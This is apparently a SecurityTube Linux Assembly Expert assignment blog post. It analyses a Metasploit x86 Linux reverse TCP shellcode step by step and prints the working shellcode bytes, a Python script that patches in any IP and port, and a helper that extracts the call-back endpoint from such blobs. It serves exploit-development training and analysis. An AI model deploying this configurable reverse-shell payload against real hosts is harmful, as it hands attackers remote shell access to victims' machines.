SLAE – Assignment #2: Reverse TCP Shell
Assignment #2: Reverse TCP Shell
Create a shell_reverse_tcp shellcode that connects back to an IP address on a specific port and executes a shell. The IP address and port number should be easily configurable.
Again, instead of going for the path of writing a C TCP reverse shell from scratch, I decided to generate a raw Metasploit payload and analyze it with libemu.
Analyzing the Shellcode
All the code is also available on GitHub.
This time the analysis will be a lot shorter, because we can reuse much of the code we already analyzed in the previous assignment.
I’ve generated the graph with libemu in order to simplify our analysis:
Analyzing the image, we can understand that the shellcode needs to perform the following steps:
- Create a socket
- Duplicate the file descriptors
- Connect to the specified IP and port
- Execute /bin/sh via execve
ASM:
;----------- Create Socket ----------------------------
xor ebx,ebx             ; ebx = 0
mul ebx                 ; eax = edx = 0 (edx stays 0 for the rest of the shellcode)
push ebx                ; 0 (protocol)
inc ebx                 ; ebx = 1 (socketcall type SYS_SOCKET)
push ebx                ; 1 (SOCK_STREAM)
push byte 0x2           ; 2 (AF_INET)
mov ecx,esp             ; ecx = pointer to the args array
mov al,0x66             ; syscall 102 (socketcall), ebx = 1 -> socket()
int 0x80                ; syscall, eax = socket fd
;----------- Duplicate the file descriptor ------------
xchg eax,ebx            ; ebx = socket fd
pop ecx                 ; ecx = 2 (the AF_INET value pushed above), used as fd counter
dup_loop:
mov al,0x3f             ; syscall 63 (dup2)
int 0x80                ; dup2(sockfd, ecx)
dec ecx                 ; next fd: 2 (stderr), 1 (stdout), 0 (stdin)
jns dup_loop            ; loop until ecx becomes negative
;----------- Connect -----------------------------------
push dword 0x100a8c0    ; sin_addr: bytes c0 a8 00 01 = 192.168.0.1
push dword 0x5c110002   ; sin_family AF_INET (2) + sin_port 4444 (0x115c in network byte order)
mov ecx,esp             ; ecx = pointer to the sockaddr_in structure
mov al,0x66             ; syscall 102 (socketcall); eax was 0 after the last dup2
push eax                ; addrlen = 0x66 (larger than sizeof(sockaddr_in), but accepted)
push ecx                ; pointer to sockaddr_in
push ebx                ; socket fd
mov bl,0x3              ; type of socketcall (3 = SYS_CONNECT)
mov ecx,esp             ; ecx = pointer to the args array
int 0x80                ; syscall
;----------- Execve -----------------------------------
push edx                ; NULL terminator for the string (edx = 0)
push dword 0x68732f6e   ; "n/sh"
push dword 0x69622f2f   ; "//bi"
mov ebx,esp             ; ebx = pointer to "//bin/sh"
push edx                ; NULL
push ebx                ; pointer to filename
mov ecx,esp             ; argv = [filename, NULL]
mov al,0xb              ; syscall 11 (execve)
int 0x80                ; syscall
Here is the hex-encoded Metasploit payload:
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x00\x01\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
Knowing that our shellcode was configured for port 4444 (bytes \x11\x5c, i.e. 0x115c in network byte order, which libemu displays as 0x5c11 once the endianness is accounted for) and for the IP address 192.168.0.1 (bytes \xc0\xa8\x00\x01), I built a simple Python script allowing me to easily replace the port and IP address in our shellcode.
#!/usr/bin/env python3
# Paolo Stagno aka [VoidSec](https://voidsec.com)
# SLAE-1511
import sys

if len(sys.argv) != 3:
    print("usage: " + sys.argv[0] + " ip port")
    sys.exit(-1)

ip = sys.argv[1]
octets = ip.split('.')
if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
    print("[!] Invalid IPv4 address {}".format(ip))
    sys.exit(-1)
# each octet as a zero-padded \xNN, in the order the bytes sit in memory (network byte order)
hip = "".join("\\x{:02x}".format(int(o)) for o in octets)

port = int(sys.argv[2])
if port < 0 or port > 65535:
    print("[!] Invalid TCP port number {}, must be between 0-65535".format(port))
    sys.exit(-1)
# port as four zero-padded hex digits (network byte order), split into \xNN pairs;
# hex(port).strip("0x") would drop leading digits for ports below 0x1000 and any
# trailing zeros, producing a truncated and therefore broken payload
hport = "{:04x}".format(port)
hport = "".join("\\x" + hport[i:i + 2] for i in range(0, 4, 2))

shellcode = ("\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80"
             "\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9"
             "\\x68{}\\x68\\x02\\x00{}"
             "\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1\\xcd\\x80"
             "\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"
             ).format(hip, hport)
print("Reverse TCP shellcode connecting to {}:{} - {}:{}".format(ip, port, hip, hport))
print("\n" + shellcode)
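The two `push dword` instructions in the Connect section and the port/IP patching above both come down to the layout of `sockaddr_in` on the stack: the first push supplies `sin_addr`, the second supplies `sin_family` (AF_INET, a little-endian word) together with `sin_port` (network byte order). The reverse of the patching script is what an analyst needs when a blob like this shows up in a capture or a memory dump: recover the call-back endpoint without running it. The following Python 3 helper is an added example written for this page, not code from the original post or from Metasploit; it locates the push pair by its opcode pattern (0x68 imm32, then 0x68 imm32 whose low word is 0x0002) and decodes the fields with `struct` and `socket`, which also handles ports below 0x1000 correctly.

```python
#!/usr/bin/env python3
"""Recover the connect-back endpoint from an x86 Linux reverse-TCP shellcode blob.

Added example for this page (not the post's own code). It relies on the
sockaddr_in being built with two 'push dword' (opcode 0x68) instructions,
as the Metasploit payload analyzed above does.
"""
import re
import socket
import struct

# The post's shellcode, copied byte for byte from its hex string.
SHELLCODE = bytes.fromhex(
    "31dbf7e35343536a0289e1b066cd80"               # socket(AF_INET, SOCK_STREAM, 0)
    "9359b03fcd804979f9"                           # dup2 loop over fds 2, 1, 0
    "68c0a80001680200115c"                         # push sin_addr; push family + port
    "89e1b066505153b30389e1cd80"                   # connect(sockfd, &sockaddr, 0x66)
    "52686e2f7368682f2f626989e3525389e1b00bcd80"   # execve("//bin/sh", [ptr, NULL], NULL)
)

# push imm32 (sin_addr), then push imm32 whose low word is AF_INET (0x0002)
# and whose high word is the port in network byte order.
_SOCKADDR_PUSHES = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)


def extract_endpoints(blob):
    """Return a list of (ip, port) tuples found in the blob (normally one)."""
    found = []
    for m in _SOCKADDR_PUSHES.finditer(blob):
        ip = socket.inet_ntoa(m.group(1))          # pushed bytes are already in network order
        port = struct.unpack("!H", m.group(2))[0]  # big-endian 16-bit port
        found.append((ip, port))
    return found


def sockaddr_in_bytes(ip, port):
    """First 8 bytes of a sockaddr_in as they lie in memory:
    sin_family (little-endian word), sin_port (network order), sin_addr (network order)."""
    return struct.pack("<H", socket.AF_INET) + struct.pack("!H", port) + socket.inet_aton(ip)


def sockaddr_from_blob(blob):
    """The 8 sockaddr_in bytes as the kernel reads them off the stack.
    The later push lands at the lower address, so family + port precede the address."""
    m = _SOCKADDR_PUSHES.search(blob)
    if m is None:
        return None
    return b"\x02\x00" + m.group(2) + m.group(1)


if __name__ == "__main__":
    for ip, port in extract_endpoints(SHELLCODE):
        print("connect-back endpoint: {}:{}".format(ip, port))
    # the bytes recovered from the blob match a sockaddr_in built with struct
    print(sockaddr_from_blob(SHELLCODE) == sockaddr_in_bytes("192.168.0.1", 4444))
```

`sockaddr_from_blob` reassembles the structure in memory order, so it can be compared directly with `sockaddr_in_bytes`, which builds the same eight bytes from an address and a port; the equality of the two for the page's payload confirms the reading of `0x5c110002` given in the assembly comments. The opcode-pattern match is deliberately narrow: a payload that builds the structure with different instructions (or an encoded payload) will simply yield no match rather than a wrong endpoint.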
SLAE Exam Statement
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE-1511